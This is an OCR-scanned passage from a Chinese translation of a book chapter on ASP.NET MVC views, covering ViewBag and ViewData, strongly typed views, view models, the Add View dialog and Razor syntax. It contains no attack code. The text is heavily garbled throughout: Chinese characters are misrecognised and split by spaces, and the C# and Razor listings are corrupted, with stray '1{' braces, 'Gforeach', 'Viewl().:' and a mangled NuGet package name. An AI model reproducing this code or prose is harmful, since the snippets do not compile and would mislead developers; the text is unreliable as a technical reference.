视图 实际 上 就 是 应 用 程序 的 “大 使 ”一 一 将 应 用 程序 呈现 给 用 户 ， 并 日 会 显著 影响 用 
户 对 应 用 程序 的 第 一 印象 。 

显而易见 ， 如 果 应 用 程序 的 其 他 部 分 存在 错误 ， 那 么 设计 再 好 ， 再 没有 玻 狗 的 视图 也 
不 能 弥补 这 方面 的 不 足 。 同 样 ， 如 果 创 建 一 个 丑陋 且 难 以 利用 的 视图 ， 那 么 许多 用 户 将 不 
会 给 应 用 程序 提供 证 明 它 的 功能 多 么 强大 、 运 行 多 么 顺畅 的 机 会 。 

本 章 不 会 向 读者 展示 如 何 设计 精彩 的 视图 。 尽 管 整洁 干净 的 标记 可 以 使 设计 工作 轻 
松 ， 但 是 可 视 化 设计 是 从 呈现 内 容 分 离 一 个 的 关注 点 。 因 此 ， 本 章 将 阐述 视图 在 ASPNET 
MVC 中 的 工作 原理 及 其 职责 ， 并 提供 了 工具 来 创建 应 用 程序 引 以 为 豪 的 视图 。 
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3.1 视图 的 作用 


第 2 章 分 析 了 控制 器 如 何 返回 输出 到 浏览 器 的 字符 串 。 这 对 于 控制 器 的 入 门 非常 有 帮 
助 ， 但 在 一 些 重大 的 Web 应 用 程序 中 ， 我 们 会 注意 到 一 个 迅速 发 展 的 模式 : 大 部 分 的 控制 
器 操作 需要 以 HTML 格式 动态 显示 信息 。 如 果 控 制 器 操作 仅仅 返回 字符 串 ， 那 么 就 需要 有 
大 量 的 字符 串 替 换 操 作 ， 这 样 就 会 变 得 混乱 不 堪 。 因 此 ， 模 板 系 统 的 需求 越 来 越 清晰 ， 此 
时 ， 视 图 应 运 而 生 。 

视图 的 职责 是 向 用 户 提 供用 户 界 面 。 当 提供 对 模型 (控制 句 需 要 显示 的 信息 ) 的 引用 后 ， 
视图 会 把 模型 转换 为 准备 反馈 给 用 户 的 格式 。 在 ASPNET MVC 中 ， 完 成 这 一 过 程 由 两 部 
分 操作 , 其 中 一 个 是 检查 由 控制 器 提交 的 模型 对 象 , 男 一 个 是 将 其 内 容 转 换 为 HTML 格式 。 


注意 并 非 所 有 视图 都 泻 染 HTML 格式 。 当 然 ， 在 创建 Web 应 用 程序 的 
过 程 中 ，HTML 是 最 常用 的 格式 。 正 如 第 16 章 中 操作 结果 部 分 介绍 的 那样 ， 
视图 也 可 以 泻 染 其 他 类 型 的 内 容 。 


下 面 来 快速 浏览 一 个 视图 的 例子 。 这 段 代 码 展 示 了 一 个 位 于 路 径 /Views/Home/Sample.cshtml 
下 ， 名 为 Sample.cshtml 的 视图 ， 如 下 程序 清单 3-1 所 示 : 


程序 清单 3-1: 示例 视图 一 Sample.cshtml 


@ 1{ 
Layout = null; 
} 
<1IDOCTYPE html>»> 
<html> 
<head><title>sSsample View</title></head> 
<body> 
<hl>@ViewBag.Message</hl1> 
<p> 


This is a sample wview. It's not much to look at, 
but it gets the JjJob done. 
</p> 
</body> 
</html> 


这 是 一 个 非常 简单 的 视图 示例 ， 它 实现 了 通过 @ViewBag.Message 表达 式 来 显示 控制 
右 设 置 的 消 恩 。 在 本 章 后 面 ， 将 会 更 多 地 学 习 ViewBag 和 其 他 传递 信息 到 视图 的 方法 。 当 
泻 染 代码 示例 中 的 视图 时 , 在 控制 器 中 设置 的 值 就 会 替代 其 中 的 表达 式 并 以 HTML 标记 的 
不 像 基于 文件 的 Web 框架 ， 比 如 ASPNET Web Forms 和 PHP， 视 图 本 身 不 会 被 直接 
访问 ， 浏 览 器 不 能 直接 指向 一 个 视图 并 泻 染 它 。 相 反 ， 视 图 总 是 被 控制 器 演 染 ， 因 为 控制 
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右 为 它 提供 了 要 演 染 的 数据 。 下 向 来 看 一 个 控制 占 的 示例 代码 ， 示 例 中 的 控制 融 可 能 已 经 
对 视图 进行 了 初始 化 ， 如 程序 清单 3-2 所 示 : 


程序 清单 3-2: Home Controller 一 HomeController.cs 


public class HomeController : Controller | 
public ActionResult Sample() 1{ 
ViewBag.Message = "Hello World. Welcome to ASP.NET MVC!"; 
return View(" "Sample™)};}; 


注意 上 述 示例 中 的 控制 右 将 ViewBag.Message 属性 值 设 管 成 一 个 字符 串 ， 然 后 返回 一 
个 名 为 Sample 的 视图 。 返 回 的 视图 就 是 程序 清单 3-1 中 的 Sample.cshtml 视图 。 它 将 显示 
传递 给 ViewBag. Message 属性 的 值 。 


3 指定 见 图 | 


9 和 -+ 外 DE- 


上 一 节 中 介绍 了 视图 的 功能 。 这 一 节 将 要 介绍 如 何 为 een meee pee 
特定 操作 指定 用 来 泻 染 输出 结果 的 视图 。 事 实 上 ， 遵 特 全 re 
ASPNET MVC 框架 的 约定 ， 为 操作 指定 视图 是 非常 人 a 
单 的 。 ES 

当 创 建新 的 项 目 模板 时 ， 将 会 注意 到 ， 项 目 以 一 种 非 ss 


第 具体 的 方式 包含 了 一 个 结构 化 的 Views 目录 (如 图 3-1 i fr 一 一 


I ChangeP srodPartid. cetml 


所 :) oO I _Extermall oginsListPartial.cshtml 


[®] _ RemoveErtemal ognPartialLeshtml 


按照 约定 ， 每 个 控制 器 在 Views 目录 下 都 有 一 个 对 应 mena 


0) Externall egrnbadure. cshtenl 


的 文件 夹 ， 其 名 称 与 控制 器 一 样 ， 只 是 没有 Controller 后 je] Login.cshtml 


[本 Menasgecshtml 


缀 名。 例如， 控制 器 HomeController 在 Views 目录 下 就 会 ee 


[本 AbBeut.cohtnd 
对 应 有 一 个 名 为 Home 的 文件 夹 。 ee 
各] Shiared 


在 每 一 个 控制 器 的 View 文件 夹 中 ， 每 一 个 操作 方法 ey Leyout cshim 


I§] LaginParialLeshbrl 


部 有 一 个 同名 的 视图 文件 与 其 相对 应 。 这 就 提供 了 视图 与 Nr 
a Web.config 


操作 方法 关联 的 基础 o 例 如 9 操作 方法 通过 Vlew 方法 返 | feiconjce 


b Glebalase 


回 ViewResult 对 象 ， 代 码 如 下 所 示 : ,Dptogeecerts 


public class HomeController : Controller 1{ 图 3-1 
public ActionResult Index() 1{ 
ViewBag.Message = "Modify this template to JjJump—start 
Vour ASP.NET MVC applicatijion.”; 
return Viewl().: 
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这 个 方法 看 起 来 应 该 很 熟悉 ， 因 为 它 束 是 默认 项 目 模板 中 控制 磊 HomeController 的 
Index 操作 方法 。 

注意 ， 与 程序 清单 3-2 中 的 例子 不 同 ， 这 个 控制 费 操 作 没 有 指定 视图 的 名 称 。 当 不 指 
定 视图 名 称 时 ， 操 作 方 法 返回 的 ViewResult 对 象 将 按照 约定 来 确定 视图 。 它 会 在 目录 
/Views/ControllerName( 这 里 的 ControllerName 不 币 Controller 后 级 ) 下 查找 与 action 名 称 相 
同 的 视图 。 这 种 情况 下 选择 的 视图 便 是 /Views/Home/Index.cshtml。 

与 ASPNET MVC 中 的 大 部 分 约定 设置 一 样 ,这 一 约定 是 可 以 重 写 的 。 如 采 想 让 Index 
操作 方法 泻 染 一 个 不 同 的 视图 ， 可 以 回 其 提供 一 个 不 同 的 视图 名 称 ， 代 码 如 下 所 示 : 

public ActionResult Index() 1{ 

ViewBag.Message = "Modify this template to jump-—start 
Vour ASP.NET MVC application."} 
return View("NotIndex").: 

} 

这 样 编码 后 ， 虽 然 操 作 方 法 仍然 在 /Views/Home 目录 中 查找 视图 ， 但 选择 的 不 再 是 
Index.cshtml， 而 是 Notmdex.cshtml。 然 而 ， 在 其 他 一 些 应 用 中 ， 我 们 可 能 需要 指定 完全 位 
于 不 同 目录 结构 中 的 视图 。 针 对 这 种 情况 ， 我 们 可 以 使 用 帝 有 一 符号 的 语法 来 提供 视图 的 
完整 路 径 ， 代 码 如 下 所 示 : 

public ActionResult Index() 1{ 

ViewBag.Message = "Modify this template to Jump—start 
Vour ASP.NET MVC application.™? 
return View("~/Views/Example/Index.cshtml").: 

} 

注意 ， 为 了 在 查找 视图 时 避 开 视图 引擎 的 内 部 查找 机 制 ， 在 使 用 这 种 语法 时 ， 必 须 提 
供 视 图 的 文件 扩展 名 。 

ViewData 和 ViewBag 


前 面 的 例子 中 ， 在 从 控制 器 癌 视 图 传递 信息 时 ， 用 到 了 ViewBag.Message 属性 。 这 里 
对 ViewBag 进行 详细 介绍 。 

从 技术 角度 讲 ， 数 据 从 控制 器 传送 到 视图 是 通过 一 个 名 为 ViewData 的 ViewDataDictionary 
(这 是 一 个 特殊 的 字典 类 )。 我 们 可 以 使 用 标准 的 字典 语法 设置 或 读 取 其 中 的 值 ， 示 例如 下 : 

ViewData["CurrentTime"] = DateTime.Now; 

尽管 这 种 语法 现在 也 能 使 用 ， 但 是 ASPNET MVC 3 拥有 更 简单 的 语法 ， 它 利用 了 C# 
4 的 dynamic 字段 。ViewBag 是 ViewData 的 动态 封装 右 。 这 样 我 们 就 可 以 按照 下 和 面 的 方式 
来 设置 值 : 


ViewBag.CurrentTime = DateTime .Now:; 
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因此 ，ViewBag.CurrentTime 等 同 于 ViewData["CurrentTime"]。 
大 多 数 情况 下 ， 这 两 种 语法 彼此 之 间 并 不 存在 真正 的 技术 差异 。ViewBag 相对 于 字 和 典 
语法 而 言 仅 仅 是 一 种 受 开 发 人 员 欢 迎 的 语法 而 已 。 


注意 尽管 选择 一 种 语法 格式 并 不 比 选择 另 一 种 格式 具有 真正 的 技术 优 
势 ， 但 是 二 者 之 间 的 一 些 关键 差异 还 是 需要 知道 的 。 

很 明显 的 一 个 差异 就 是 只 有 当 要 访问 的 关键 字 是 一 个 有 效 的 C# 标 识 符 
时 ，ViewBag 才 起 作用 。 例如 ， 如 果 在 ViewData["Key With Spaces"] 中 存放 一 
个 值 ， 那 么 就 不 能 使 用 ViewBag 访 问 。 因 为 这 样 根 本 就 无 法 通过 编译 。 

另 一 个 需要 知道 的 重要 差异 是 ， 动 态 值 不 能 作为 一 个 参数 传递 给 扩展 方 
法 。 因 为 C# 编 译 器 为 了 选择 正确 的 扩展 方法 ， 在 编译 时 必须 知道 每 一 个 参数 
的 真正 类 型 。 

如 果 其 中 任何 一 个 参数 是 动态 的 ,那么 就 不 会 通过 编译 。 例 如 ， 这 行 代码 
就 会 编译 失败 : @HtmlTextBox("name"，ViewBag.Name)。 要 使 这 行 代 码 通 过 
编译 有 两 种 方法 : 第 一 是 使 用 ViewData["Name"]， 第 二 是 把 ViewBag Name 
值 转 换 为 一 个 具体 的 类 型 : (string)ViewBag.Name.。 


3.3” 强 类 型 视图 


假设 现在 再 要 编写 一 个 显示 Album 实例 列表 的 视图 。 一 种 简单 方法 就 是 通过 ViewBag 
属性 把 那些 Album 实例 添加 到 视图 数据 字典 中 ， 然 后 在 视图 中 友 代 它们 。 
例如 ， 控 制 右 操作 中 的 代码 可 能 与 下 面 代码 一 梓 ， 如 下 所 未 : 


public ActionResult List() I 
var albums = new List<Album> () ; 
for(int 1 = 0; 1 < 10; 1++) 1 
albums.Add (new Album {Title = "Product ™ + 工 上 7， 
} 
ViewBag.Albums = albums; 
return View!(); 


} 
随后 ， 再 在 视图 中 达 代 和 显示 产品 ， 如 以 下 代码 所 示 : 


<ul> 

Gforeach (Album a in (ViewBag.Albums as IEnumerable<Album>)) 1{ 
<1i>la.Title</1i> 

} 


</ul> 
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注意 在 枚 举 之 前 需要 将 动态 的 ViewBag.Albums 转换 为 IEnumerable<Album> 类 型 。 为 
了 使 视图 代码 干净 整洁 ， 在 这 里 也 可 以 使 用 dynamic 关键 字 ， 但 是 当 访 问 每 个 Album 对 象 
的 属性 时 ， 就 不 再 能 使 用 智能 感知 功能 。 
<Uul> 
Qforeach (dynamic p in ViewBag.Albums) 1{ 
<1i>@p.Title</l1i> 
} 


</ul> 

如 果 既 能 获得 dynamic 下 的 简洁 语法 , 义 能 获得 强 类 型 和 编译 时 检查 的 好 处 (比如 正确 
地 输入 属性 和 方法 名 称 )， 就 完美 了 。 可 喜 的 是 ， 强 类 型 视图 可 以 帮助 我 们 获得 这 些 。 

请 记 住 ，ViewData 是 ViewDataDictionary 类 型 的 ， 而 不 仅 是 一 个 通用 的 Dictionary 。 
之 所 以 这 样 ， 其 中 一 个 原因 是 ， 它 有 一 个 额外 的 Model 属性 ， 可 以 用 来 在 视图 中 获取 指定 
的 模型 对 象 。 由 于 在 ViewData 中 只 能 包含 一 个 模型 对 象 ， 因此， 我 们 利用 这 一 点 可 以 很 容 
易 地 实现 向 视图 传递 一 个 特定 的 类 对 象 。 这 样 使 得 视图 可 以 指定 期 望 模型 对 象 的 类 型 ， 这 
里 的 允许 我 们 利用 强 类 型 。 

在 Controller 方法 中 ， 可 以 通过 回 重 载 的 View 方法 中 传递 模型 实例 来 指定 模型 ， 代 码 
如 下 所 示 : 

Public ActionResult List()} 1 

Var albums = new List<Album> (); 
for (nt 1 = 0; 1 < lO0; I++ { 

albums.Add (new Album {Title = "Album ™ + 1}); 
} 


return View (albums).: 


} 


在 后 人 台 ， 首 先 把 传 给 View 方法 的 值 赋 给 ViewData.Model 属性 。 然 后 告知 视图 哪 种 类 
型 的 模型 正在 使 用 @model 声明 。 注意 这 里 需要 输入 模型 类 型 的 完全 限定 类 型 名 (名 称 空间 和 
类 型 名 称 )， 如 下 所 示 : 


Gmodel IEnumerable<MvcApplicationl .Models .Album> 
<uUul> 

Qforeach (Album p in Model) 1{ 

<1i>@p.Title</li> 

} 


</ul> 


如 果 不 想 输入 模型 类 型 的 完全 限定 类 型 名 ， 可 使 用 @using 关键 字 声 明 ， 如 下 所 示 : 


Qusing MvcApplicationl .Models 
Gmodel IEnumerable<Album> 
<Uul> 

Qforeach (Album p in Model) 1{ 
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< i>gep .TitlLe</ liI> 

} 

</ul> 

对 于 在 视图 中 经 常 使 用 的 名 称 空 间 ， 一 个 较 好 的 方法 就 是 在 Views 目录 下 的 web.config 
文件 中 声明 。 


Qusing MvyvcApplicationl.Models 
<Ssystem.web.webPages .razor> 


<pages pageBaseType="System.Web.Mvc .WebViewPage"> 
<namespaces> 
<add namespace="System.Web.Mvc" /> 
<add namespace="System.Web.Mvc.Ajazx”" /> 
<add namespace="System.Web.Mvc.Html™" /> 
<add namespace="System.Web.Routing" /> 


<add namespace="MvcApplicationl .Models" /> 
</namespaces> 
</pages> 
</system.web.webPages.razor> 
为 了 得 看 先前 的 两 个 例子 的 实际 应 用 ,使 用 NuGet 将 Wrox.ProMvc4.Views.AlbumList 
包 安 装 到 一 个 默认 的 ASPNET MVC 4 项 目 中 ， 如 下 所 示 : 


Install-Package Wrox.ProMvc4.Views.AlbumList 


这 样 就 把 两 个 视图 例子 放 进 了 文件 夹 \Views\Albums 中 , 并 且 把 相应 的 控制 器 代码 放 进 
了 文件 夹 \Samples\AlbumList 中 。 按 CtrltF5 快捷 键 运 行 项 目 ， 在 浏览 器 中 访问 /albums/ 
listweaklytyped 和 /albums/liststronglytyped， 就 可 以 看 到 代码 的 运行 效果 。 


3.4 ”视图 模型 


视图 通常 需要 显示 各 种 没有 直接 映射 到 域 模型 的 数据 。 例 如 ， 可 能 需要 视图 来 显示 单 
个 商品 的 详细 信息 。 有 时 在 同一 视图 上 也 需要 显示 商品 附带 的 其 他 信息 ， 比 如 当前 登录 系 
统 的 用 户 名 、 该 用 户 是 否 有 权 编 辑 商 品 等 。 

把 与 视图 主 模型 无 关 的 数据 存放 在 ViewBag 属性 中 , 可 以 很 容易 地 实现 这 些 数据 在 视 
图 中 的 显示 ， 而 且 也 为 在 视图 中 显示 数据 提供 了 一 个 灵活 的 方法 。 

但 这 并 非 适 用 于 每 个 人 。 如 果 要 严格 控制 流入 视图 的 数据 ， 就 必须 使 所 有 数据 都 是 强 
类 型 数据 ， 以 便 视图 编写 人 员 能 够 利用 智能 感知 功能 。 

可 能 采用 的 一 个 方法 是 编写 目 定 义 的 视图 模型 类 。 这 里 的 视图 模型 可 以 看 成 仅 限 于 回 
视图 提供 信息 的 模型 。 注 意 这 里 使 用 的 术语 “视图 模型 ”不 同 于 Model View ViewModel 
(MVVM) 模 式 中 视图 模型 的 概念 。 这 也 是 当 在 讨论 视图 模型 时 ， 作 者 倾 癌 于 使 用 术语 “ 视 
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例如 ， 如 果 需 要 一 个 购物 车 汇总 页 面 ， 用 来 显示 商品 列表 、 购 物 车 中 商品 的 总 金额 以 
及 显示 给 用 户 的 消息 ， 就 可 以 创建 ShoppingCartSummaryViewModel 类 ， 如 下 所 示 : 
public class ShoppingCartViewModel 1 
public IEnumerable<Product> Products { get; set; } 
public decimal CartTotal { get; set; |} 
public string Message 1{ get; set; } 
} 
现在 可 使 用 如 下 的 @model 指令 ， 同 这 个 模型 中 强制 性 地 输入 一 个 视图 : 


model ShoppingCartsummaryViewModel 
这 恕 在 不 再 要 改变 Model 类 的 情况 下 市 来 了 强 类 型 视图 的 益处 ， 其 中 包括 类 型 检查 、 
智能 感知 以 及 免 于 转换 无 类 型 的 ViewDataDictionary 对 象 。 
下 面 看 一 个 购物 车 视图 模型 的 例子 ， 在 NuGet 中 运行 下 面 的 命令 : 


Install-Package WOX.-PFOMvc3.VIewSs .VliewModel 


前 面 几 节 介 绍 耳 一些 视 图 模型 相关 的 概念 。 下 一 章 将 更 详细 地 介绍 模型 。 
3.5 添加 仙 图 


3.2 节 介 绍 了 控制 器 指定 视图 的 基本 原理 。 但 是 如 何 创建 视图 呢 ? 虽 然 可 以 手动 创建 
视图 文件 ， 然 后 把 它 添 加 到 Views 目录 下 ， 但 是 Visual Studio 中 的 ASPNET MVC 工具 的 
Add View 对 话 框 使 得 创建 视图 非常 容易 。 


3.5.1 Add View 对 话 框 中 的 选项 


显示 Add View 对 话 框 最 简单 的 方法 就 是 在 操作 方法 上 右 击 。 在 这 个 例子 中 ， 我 们 首 
先 添 加 一 个 新 的 名 为 Edit 的 操作 方法 ， 然 后 使 用 Add View 对 话 框 创 建 一 个 视图 。 开 始 时 ， 
在 MVC 4 应 用 程序 的 HomeController 控制 器 中 添加 Edit 操作 方法 , 方法 中 包含 如 下 代码 : 


public ActionResult Edit () 
{ 


return View(); 


} 


下 一 步 , 在 操作 方法 中 右 击 , 选择 Add View 菜单 项 ,打开 Add View 对 话 框 ， 如 图 3-2 
所 示 。 
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public ActionResult Edit() 


{ 
return View( ) J 四 addView.. CtrleM Coley 
} 加 Ge To View Chrlis bd, Chl*G 
} Refactor 
} Orgenae Usings 
Generate eqUence Dagram.. 
于 Run Tests ChrisR T 


Debug Tests Cirl*R CirlaT 


图 3-2 
打开 的 Add View 对 话 框 如 图 3-3 所 示 。 


| Wiew name: 
| 醒 
View engine: 


row > 


| Create a strongly-typed view 
Model class: 


scaffold template: 
Empty 


[|] Create as a partial view 


[| Use a layout or master page: 


(Leave empty ff rt 1s set in a Razor _viewstart file) 


MamntContent 


下 面 的 列表 对 每 一 个 菜单 项 进行 了 详细 描述 : 

e View name: 当 从 一 个 操作 方法 的 上 下 文中 打开 这 个 对 话 杠 时， 视图 的 名 称 默 认 被 
填充 为 操作 方法 的 名 称 。 视 图 的 名 称 实质 上 是 需要 的 。 

e View engine: 对 话 框 中 的 第 二 个 选项 是 视图 引擎 。 从 ASP.NET MVC 3 开始 ，Add 
View 对 话 框 文 持 多 视图 引擎 选项 ， 本 章 后 面 将 深入 讲解 视图 引擎 。 默 认 情况 下 ， 
在 这 个 对 话 框 中 只 有 两 个 选项 : Razor 和 ASPX。 但 是 因为 这 个 下 拉 框 是 可 扩展 的 ， 
所 以 第 三 方 视 图 引擎 可 以 出 现在 这 个 下 拉 框 中 。 

se。 Create a strongly-typed view: 选择 Create a strongly-typed view 复 选 杠 ， 就 可 以 输 
入 或 选择 一 个 模型 类 。 下 拉 框 中 的 类 型 列表 是 使 用 反射 填充 的 ， 这 使 得 在 指定 一 个 
模型 类 型 之 前 就 确保 项 目 至 少 被 编译 一 次 。 
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Scaffold template: 一 旦 选择 一 个 模型 类 型 ， 就 可 以 选择 一 个 基 架 模板 。 这 些 模板 
利用 Visual Studio T4 模板 系统 来 生成 基于 选择 模型 类 型 的 视图 , 模板 描述 如 表 3-1 
所 示 。 


表 3-1 视图 基 架 类 型 


Scaffold 描 述 


LT 


Create 


Delete 


Detalls 
Edit 


List 


创建 一 个 空 视 图 ， 使 用 @model 语法 指定 模型 类 型 

创建 一 个 视图 ， 其 中 带 有 创建 模型 新 实例 的 表单 ， 并 为 模型 类 型 的 每 一 个 属性 生 
成 一 个 标签 和 编辑 器 

创建 一 个 视图 ， 其 中 带 有 删除 现 有 模型 实例 的 表单 ， 并 为 模型 的 每 一 个 属性 显示 
一 个 标签 以 及 当前 该 属性 的 值 

创建 一 个 视图 ， 它 显示 了 模型 类 型 的 每 一 个 属性 的 标签 及 其 相应 值 
创建 一 个 视图 ， 其 中 带 有 编辑 现 有 模型 实例 的 表单 ， 并 为 模型 类 型 的 每 一 个 属性 
生成 一 个 标签 和 输入 框 

创建 一 个 带 有 模型 实例 表 的 视图 。 为 模型 类 型 的 每 一 个 属性 生成 一 列 。 确 保 操 作 
方法 向 视图 传递 的 是 IEnumerable<YourModelType> 类 型 。 同 时 为 了 执行 创建 / 编 
辑 / 删 除 操 作 ， 视 图 中 还 包含 了 指 加 操作 的 链接 


Reference script libraries: 这 个 选项 用 来 指示 要 创建 的 视图 是 否 应 该 包含 指 问 
JavaScript 库 ( 如 果 对 视图 有 意义 的 话 ) 的 引用 。 默 认 情 况 下 ，_Layout.cshtml 文件 既 
不 引用 jQuery Validation 库 ， 也 不 引用 Unobtrusive jQuery Validation 库 ， 只 引用 主 
jQuery 库 。 

当 创 建 一 个 包含 数据 条 目 表 单 的 视图 (如 Edit 视图 或 Create 视图 ) 时 , 就 需要 选中 这 
个 选项 并 确保 生成 的 视图 引用 了 这 些 库 。 如 果 要 实现 客户 疹 验 证 ,那么 这 些 库 就 是 
必需 的 。 此 外 ， 完 全 可 以 忽略 这 个 复 选 框 。 


注意 ”由 于 是 由 特定 的 视图 基 染 T4 模板 完全 控制 这 个 复 选 框 的 行为 ， 因 


此 对 于 自 定 义 的 视图 基 架 模板 和 其 他 视图 引擎 来 说 它 会 有 所 不 同 。 


Create as a partial view: 选择 这 个 选项 意味 痢 要 创建 的 视图 不 是 一 个 完整 的 视图 ， 
因此 ，Layout 选项 是 不 可 用 的 。 对 于 Razor 视图 引擎 来 说 ， 生 成 的 部 分 视图 除了 在 
其 顶部 没有 <html> 标 签 和 <head> 标 签 之 外 ， 很 像 一 个 常规 的 视图 。 

Use a layout or master page: 这 个 选项 决定 了 要 创建 的 视图 是 否 引 用 布局 (或 母 版 
页 )， 是 否 成 为 一 个 完全 独立 的 视图 。 对 于 Razor 视图 引擎 来 说 ， 如 果 选 择 使 用 默认 
布局 , 就 没 必要 指定 一 个 布局 了 ,因为 在 ViewStart.cshtml 文件 中 已 经 指定 了 布局 。 
这 个 选项 是 用 来 重 写 默 认 布 局 文件 的 。 
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自 定 义 基 架 视图 


正如 本 市 提 到 ， 基 架 视 图 是 使 用 T4 模板 生成 的 。 我 们 可 以 目 定 义 已 有 的 模板 和 庄 加 


新 模板 ， 这 些 内 容 在 第 15 章 的 “高 级 主题 ”会 进行 详细 介绍 。 


当 我 们 使 用 模型 时 ，Add View 对 话 框 就 会 变 得 有 趣 。 这 里 我 们 已 经 学 习 了 如 何 使 用 视 
图 基 架 类 型 来 创建 视图 ， 第 4 章 将 继续 介绍 构建 模型 的 方法 。 


3.6 ”Razor 视图 引擎 


前 和 面 的 部 分 介绍 耳 如 何在 控制 费 中 指定 视图 以 及 如 何 添加 视图 。 然 而 这 些 内 容 并 没有 
涉及 到 在 视图 中 执行 的 语法 。ASPNET MVC 提供 了 两 种 不 同 的 视图 引擎 新 的 Razor 视 
图 引擎 和 原 有 的 Web Forms 视图 引擎 。 本 节 只 介绍 Razor 视图 引擎 ， 其 中 包括 Razor 语法 、 
布局 和 部 分 视图 等 。 

3.6.1 Razor 的 概念 


Razor 视图 引擎 是 ASPNET MVC 3 中 新 扩展 的 内 容 ， 并 且 也 是 它 的 默认 视图 引擎 。 本 
章 主 要 介绍 Razor 视图 引擎 ， 对 Web Forms 视图 引 敬 不 做 介绍 。 

Razor 是 ASPNET MVC 特性 团队 对 收 到 的 最 强烈 请 求 之 一 回应 的 产物 ， 该 请 求 建议 
提供 一 个 干净 的 、 轻 量 级 的 、 简 单 的 视图 引擎 ， 不 要 包含 忌 有 Web Forms 视图 引擎 的 “ 语 
法 累 费 ”。 许 多 开发 人 员 认 为 编写 视图 所 禹 来 的 语法 哄 首 给 读 取 视图 造成 了 阻碍 。 

在 ASPNETMVC3 中 ， 新 引入 的 Razor 视图 引擎 最 终 满足 了 这 一 请 求 。 

Razor 为 视图 表示 提供 了 一 种 精 全 的 语法 ， 最 大 限度 地 减少 了 语法 和 和 额外 的 字符 。 这 样 
就 有 效 地 减少 了 语法 障碍 ， 并 且 在 视图 标记 语言 中 也 没有 新 的 语法 规则 。 许 多 编写 Razor 
视图 的 开发 人 员 都 觉得 视图 代码 的 编写 非常 流畅 。 在 Visual Studio 中 又 为 Razor 添加 了 一 
流 的 智能 感知 功能 ， 从 而 使 得 这 种 感觉 更 加 明显 。 


产品 小 组 的 话 


”Razor 的 先驱 首先 是 被 Dmitry Robsman 作为 一 个 原型 提出 来 的 ， 主 要 是 为 了 在 考虑 简 


单 (每 次 一 页 ) 开 发 模型 的 同时 ， 尽 可 能 地 保留 ASPNET MVC 方法 的 优点 。 

他 的 原型 以 1959 年 的 科幻 恐怖 电影 Plan 9 from Outer Space 命名 ， 这 部 电影 曾 被 认为 
是 有 史 以 来 最 糟糕 的 电影 之 一 。 

Plan 9 后 来 变 成 了 ASPNET Web Pages, 也 就 是 Web 矩阵 (Web Matrix) 默 认 的 运行 时 框 
架 ， 它 提供 了 一 个 非常 简单 的 Web 开发 的 内 联 模式 ， 尽 管 在 本 质 上 类 似 于 PHP 和 经 典 的 
ASP， 但 是 它 使 用 的 是 Razor 语法 。ASPNET 团队 的 许多 成 员 目 前 仍 使 用 术语 “Plan 9” 来 
指 代 这 一 技术 。 

ASPNET MVC 3 也 采用 了 Razor 语法 ， 这 为 起 初 使 用 ASPNET Web Pages， 后 来 决定 
转向 ASPNET MVC 的 开发 人 员 提 供 了 一 个 很 好 的 “毕业 ”报告 。 
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Razor 通过 理解 标记 的 结构 来 实现 代码 和 标记 之 间 尽 可 能 顺畅 地 转换 。 下 面 的 一 些 例 
于 会 帮助 理解 这 一 点 。 下 面 的 这 个 例子 演示 了 一 个 包含 少量 视图 逻辑 的 人 简单 Razor 视图 ; 
ca | 


// this is a block of code. For demonstration purposes, 
// we'll create a "model" inline. 


Var items = new string[|] {"one", "two", "three™}; 
} 

<html> 

<head><title>Sample View</title></head> 

<body> 

<hl>Listing Qitems.Length items.</hl> 

<uUl> 


Mforeach (var item in items) { 
<li>The item name is flitem.</1i> 
} 
</ul> 
</body> 
</html> 


上 而 的 代码 示例 采用 了 C#i 滞 法 ， 这 将 意味 着 这 个 文件 的 扩展 名 是 .cshtml。 同 理 ， 使 用 


Visual Basic 语法 的 Razor 视图 的 扩展 名 将 是 .vbhtml。 这 些 文 件 扩 展 名 很 重要 ， 因 为 它们 指 
出 了 Razor 语法 分 析 堪 的 编码 语言 的 语法 。 

下 面 详细 深入 地 介绍 Razor 的 语法 机 制 。 在 这 之 前 ， 强 烈 建议 记 住 : Razor 的 设计 理 
念 是 简单 直观 。 对 于 大 多 数 应 用 ， 我 们 不 必 关 心 Razor 语法 一 一 只 需要 在 插入 代码 时 ， 输 
入 HIML 和 @ 符 号 。 

3.6.2 ”代码 表达 式 

Razor 中 的 核心 转换 字符 是 “at” 符 号 (@)。 这 个 单一 字符 用 做 标记 -代码 的 转换 字符 ， 
有 时 也 反 过 来 用 做 代码 -标记 的 转换 字符 。 这 里 共有 两 种 基本 类 型 的 转换 : 代码 表达 式 和 代 
人 码 块 。 求 出 表达 式 的 值 ， 然 后 将 值 写 入 到 响应 中 。 

例如 ， 在 下 面 的 代 人 码 段 中 : 

<hl>Listing lstuff.Length items.</h1l> 

注意 ， 表 达 式 @stuffLength 是 作为 隐 式 代码 表达 式 求解 的 ， 然 后 在 输出 中 显示 表达 式 
的 值 3。 需 要 注意 的 一 点 是 ， 这 里 不 需要 指出 代码 表达 式 的 结束 位 置 。 相 比 之 下 ，Web Forms 
视图 只 支持 显 式 代 码 表 达 式 ， 这 样 上 面 的 代码 段 将 是 如 下 形式 : 

<hl>Listing <$%: stuff.Length $%> items.</hl> 

Razor 十 分 智能 ， 可 以 知道 表达 式 后 面 的 空格 字符 不 是 一 个 有 效 的 标识 符 ， 所 以 它 可 
以 顺畅 地 转 回 到 标记 语言 。 
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注意 ， 在 无 序列 表 中 ，@item 代码 表达 式 后 面 的 字符 是 一 个 有 效 的 代码 字符 。 但 是 Razor 
是 如 何 知 道 表 达 式 后 面 的 点 不 是 引用 当前 表达 式 的 属性 或 方法 的 呢 ? 原来 Razor 是 在 点 字 
符 处 身后 宫 看 ， 看 到 了 一 个 尖 括 号 ， 因 此 知道 这 不 是 一 个 有 效 的 标识 符 ， 所 以 会 转 回 标记 
模式 。 所 以 ， 第 一 个 列表 项 将 洽 染 成 ; 


< 1 1>The item name is one.</li> 


Razor 目 动 从 代码 转 回 标记 的 能 力 是 其 广 受 欢迎 的 一 个 方面 , 也 是 其 保持 语法 简洁 干 
净 的 秘方 。 但 是 这 样 也 市 来 了 一 些 问题 , 代码 可 能 会 出 现 潜在 的 二 义 性 。 例如 以 下 的 Razor 
片段 : 

@f 


string rootNamespace = "MyApp"; 


} 


<span>frootNamespace.Models</span> 


在 这 个 示例 中 ， 想 要 的 输出 结果 是 


<span>MyApp .Models</span> 


然而 ， 这 样 反 而 出 现 了 错误 ， 提 示 string 没有 Models 属性 。 在 这 种 边界 情况 下 ，Razor 
诚然 不 能 理解 我 们 的 意图 ， 而 会 认为 @rootNamespace.Models 是 代码 表达 式 。 半 亏 Razor 
